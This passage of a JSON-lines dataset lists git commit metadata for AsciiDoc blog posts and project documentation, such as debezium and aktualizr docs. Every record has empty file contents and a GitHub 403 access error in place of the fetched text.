2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9be64243708450ed9d9d40b08aaf418f00c414d","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96b48f38db87626e4337568ef83471bf96ff4d9f","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c73d157c7d83a7ec7eadab37e70a54efab7d64","subject":"rest: Start to document the rest interface of the system","message":"rest: Start to document the rest interface of the system\n\nThese routines should work but are not tested yet. There is an open\nactivity for creating a test for these.\n","repos":"zecke\/osmo-smsc,woglinde\/osmo-smsc,zecke\/osmo-smsc,woglinde\/osmo-smsc,zecke\/osmo-smsc,woglinde\/osmo-smsc","old_file":"docs\/rest.asciidoc","new_file":"docs\/rest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woglinde\/osmo-smsc.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0b563c80e5b5c5c0b88947f2f8aaf26a357c8aef","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9daea05b5ca5ad2c8e0232ce5cd3147729b91935","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"706fcf3b1c5bf3e6a113d34a7ccf79faf1cddd6d","subject":"Update 2015-03-30-Echography-simulator.adoc","message":"Update 2015-03-30-Echography-simulator.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-03-30-Echography-simulator.adoc","new_file":"_posts\/2015-03-30-Echography-simulator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2d76e1db3eb3a1cf7bd7691fb3d3da8f9d99895","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddc6a26ecaad1490006ce028062d984e3bb84ed0","subject":"Update 2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","message":"Update 2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","new_file":"_posts\/2019-05-16-2-Arc-Face-and-other-Geodesic-Distance-Loss-Functions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7d4a68df70f205a6eb3f40e99e8144df253c51c","subject":"Update 2015-02-10-First-post.adoc","message":"Update 2015-02-10-First-post.adoc","repos":"Red5\/red5.github.io,Red5\/red5.github.io","old_file":"_posts\/2015-02-10-First-post.adoc","new_file":"_posts\/2015-02-10-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Red5\/red5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87a09a82ce422a6cb2243f8ab9eab18c16f5283b","subject":"Update 2018-03-13-P-H-Per-Golang.adoc","message":"Update 2018-03-13-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-13-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-13-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc0b7c33c3dd0765e30e193950511b24c75ef654","subject":"some (preliminary) documentation on #219","message":"some (preliminary) documentation on #219\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"src\/docs\/development\/issue-219.adoc","new_file":"src\/docs\/development\/issue-219.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1376b2f6e37f4ea302d65654d7320e1c1d815ae3","subject":"Update 2016-01-23-Learning-XQuery-Resources.adoc","message":"Update 2016-01-23-Learning-XQuery-Resources.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"521241305bb54c55a54be72ffb220cafc84e67b7","subject":"1.7 CR announcement","message":"1.7 CR announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-09-16-debezium-1-7-cr1-released.adoc","new_file":"_posts\/2021-09-16-debezium-1-7-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a57a49b9757c38d83c8504754a2c1b2304b54735","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a67a8623e356146dd8d03be866c73475534c8d4","subject":"Update 2016-12-18-Daring-to-Live.adoc","message":"Update 2016-12-18-Daring-to-Live.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-Daring-to-Live.adoc","new_file":"_posts\/2016-12-18-Daring-to-Live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d3d4bf3cec5337bfb14f202eeb83ea00c4249c","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b9bc938e0f11475b1d41bcf0d76d432c7f2e751","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ccd5bc792e9901ead01a755ac94c3c6e1a34763","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81ed553c8f002c55a24a15ec58c9b04f03e4b944","subject":"Update 2016-08-24-reducing-game-servers-latency.adoc","message":"Update 2016-08-24-reducing-game-servers-latency.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-24-reducing-game-servers-latency.adoc","new_file":"_posts\/2016-08-24-reducing-game-servers-latency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"161af9f0cbeeafb79a8cdeec6720a1ed9ca756a9","subject":"Update 2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","message":"Update 2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","new_file":"_posts\/2017-01-20-Choosing-Chronicle-FIX-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67464194e26240e452eb74d77e19639b60337c33","subject":"Update 2017-05-28-what-you-can-see-web-analytic.adoc","message":"Update 2017-05-28-what-you-can-see-web-analytic.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-what-you-can-see-web-analytic.adoc","new_file":"_posts\/2017-05-28-what-you-can-see-web-analytic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa50a954c2e78855205d9435d89d5fa77a3f34ec","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ec4dba597d61e53cb5dccbd6c4e1b41f40f3075","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a196d9b5bb3b4c86e4653186388c0c6686d533e","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73568724ab167a00b488df19d6128cb61bcc8a02","subject":"intention\/layout\/design","message":"intention\/layout\/design\n","repos":"jzacsh\/study,jzacsh\/study,jzacsh\/study","old_file":"static\/README.adoc","new_file":"static\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/study.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"fccaf6170f7ef8a4b2a8091bd5d58287864b7f3a","subject":"Updated README","message":"Updated README\n","repos":"aucampia\/dnspod-int-py","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aucampia\/dnspod-int-py.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32bee7f3301b6a9ab05c60862c94dc34a0e9b698","subject":"Update 2016-04-12-First-Blog-Post.adoc","message":"Update 2016-04-12-First-Blog-Post.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-First-Blog-Post.adoc","new_file":"_posts\/2016-04-12-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e62dd0bb78395dc0c6a8736c9ef36bc6adc2798f","subject":"Update 2015-07-20-Linux-Shell-PATH-variation.adoc","message":"Update 2015-07-20-Linux-Shell-PATH-variation.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-07-20-Linux-Shell-PATH-variation.adoc","new_file":"_posts\/2015-07-20-Linux-Shell-PATH-variation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a5e26236ef3e394dfe740ac1dd0e12b0123e20","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5738806d58a411f9a628208176a17a2da68d06dd","subject":"y2b create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","message":"y2b create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-16-WhichSmartphoneDoTheyACTUALLYUseMKBHDAustinEvansLinusMore.adoc","new_file":"_posts\/2018-01-16-WhichSmartphoneDoTheyACTUALLYUseMKBHDAustinEvansLinusMore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced6faa0825253a4b87118f90f680e819cf9c194","subject":"License info added","message":"License info added\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f5d8401fe3fb0d04107709200d39e76cf2b45e2","subject":"Update 2015-05-31-Erster-Eintrag.adoc","message":"Update 2015-05-31-Erster-Eintrag.adoc","repos":"matthiaselzinga\/matthiaselzinga.github.io,matthiaselzinga\/matthiaselzinga.github.io,matthiaselzinga\/matthiaselzinga.github.io","old_file":"_posts\/2015-05-31-Erster-Eintrag.adoc","new_file":"_posts\/2015-05-31-Erster-Eintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthiaselzinga\/matthiaselzinga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea176b5c206591df1c7021a1ed90c75e85aa0b61","subject":"Update 2016-08-02-git-clone-CRLF.adoc","message":"Update 2016-08-02-git-clone-CRLF.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-02-git-clone-CRLF.adoc","new_file":"_posts\/2016-08-02-git-clone-CRLF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"441c6e1ae0b29b76a01f2547c1db5456a9468888","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b46d32363558af08f36121c6d3374adeb0e818","subject":"Update 2017-03-30-Website-update.adoc","message":"Update 2017-03-30-Website-update.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-30-Website-update.adoc","new_file":"_posts\/2017-03-30-Website-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be0cfad1f08bd16cf3477ff51d481a7c2e089694","subject":"Update dss-documentation.adoc","message":"Update dss-documentation.adoc\n\nNewline added for correct list rendering.","repos":"esig\/dss,openlimit-signcubes\/dss,alisdev\/dss,zsoltii\/dss,esig\/dss,zsoltii\/dss,alisdev\/dss,openlimit-signcubes\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alisdev\/dss.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"85b1124b8d16817ef9d974bf78a2016491a64e5e","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98136c0bc574d6e285394ac2acd4a8785d492ebb","subject":"Adding README-pt.adoc","message":"Adding README-pt.adoc\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/README-pt.adoc","new_file":"docs\/README-pt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"805e7238b7cf93b22d27d0e6869d653e0ee14429","subject":"Set location for image files","message":"Set location for image files\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b66a1ea002cc7784997f5647522f21888c64d5d8","subject":":memo: WebdriverIO","message":":memo: WebdriverIO\n","repos":"syon\/refills","old_file":"src\/refills\/selenium\/webdriverio.adoc","new_file":"src\/refills\/selenium\/webdriverio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5038d32ac5ce4f804d6a94c3a351247fcc6c9c52","subject":"Deleted 2015-5-10-uGUI.adoc","message":"Deleted 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e864ac8c47db75b231c982d631ace42d343fe7f9","subject":"Update 2015-05-17-Neues-Githubrepository.adoc","message":"Update 2015-05-17-Neues-Githubrepository.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Neues-Githubrepository.adoc","new_file":"_posts\/2015-05-17-Neues-Githubrepository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eab11a1471812c2cd889f2f0f57ad88e695dfbfd","subject":"Update 2017-05-28-Acemice-Belki-Hadsizce.adoc","message":"Update 2017-05-28-Acemice-Belki-Hadsizce.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-05-28-Acemice-Belki-Hadsizce.adoc","new_file":"_posts\/2017-05-28-Acemice-Belki-Hadsizce.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"547c95af6f8c26cfe74ea60fb0219491573de35e","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/phoneless.adoc","new_file":"content\/writings\/phoneless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b149b1b113155d44236aba8e18dcad0f96707001","subject":"OTA-2543: Doc on bitbaking and running Primary and Secondary images on QEMU","message":"OTA-2543: Doc on bitbaking and running Primary and Secondary images on QEMU\n\nSigned-off-by: Mike Sul <c4cf997f44ef6c8bd7ff6dc848cd2f9ad1cc931e@here.com>\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/posix-secondaries-bitbaking.adoc","new_file":"docs\/posix-secondaries-bitbaking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"2d8772c0487573dd6eff659660c30169108bf3ce","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5708138d1041c107bfdbd83452a8804b7cc658b","subject":"Tweak spelling","message":"Tweak spelling\n","repos":"lassik\/extract,lassik\/extract","old_file":"extract.1.adoc","new_file":"extract.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"2a87e14dfff7985453a6dfe27eb01ff182695c33","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 